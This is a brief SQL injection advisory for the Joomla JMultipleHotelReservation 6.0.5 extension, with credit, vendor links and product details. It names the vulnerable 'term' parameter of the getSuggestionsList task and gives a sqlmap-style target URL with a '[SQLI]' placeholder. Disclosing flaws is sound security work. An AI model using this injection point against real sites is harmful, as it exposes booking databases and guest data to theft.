Joomla JMultipleHotelReservation extension version 6.0.5 suffers from a remote SQL injection vulnerability.
4308af8e7c13ece98680b10ae8c6ecbc0e924e210cb1c53e23f4b9c29f6ec5d9
################################################
#Title: Joomla JMultipleHotelReservation 6.0.5 - SQL injection
#Credit: Bilal KARDADOU
#Vendor: http://www.cmsjunkie.com/joomla-hotel-portal
#URL:
https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jmultiplehotelreservation/
#Product: 'Joomla JMultipleHotelReservation 6.0.5'
#Developer: CMSJunkie
#Extension type: Plugin
#Last updated: Oct 30 2017
#Compatibility: 3.X
#Type: Paid download
#Google Dork: inurl:"Google is your Friend"
################################################
#
# Description:
# With over nine years of experience in the lodging industry, we offer an
easy to use, professional multiple hotel
# reservation software. Joomla Multiple Hotel Reservation is offering
management and reservation solutions for
# all types of hotels, motels, B&B, resorts, apartments etc.
#
#
# --Method=GET -p [term]
#
# -u "
http://127.0.0.1/j-myhotel/component/j-hotelportal/?task=hotels.getSuggestionsList&term=a/b'/[SQLI]
"
#
#
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################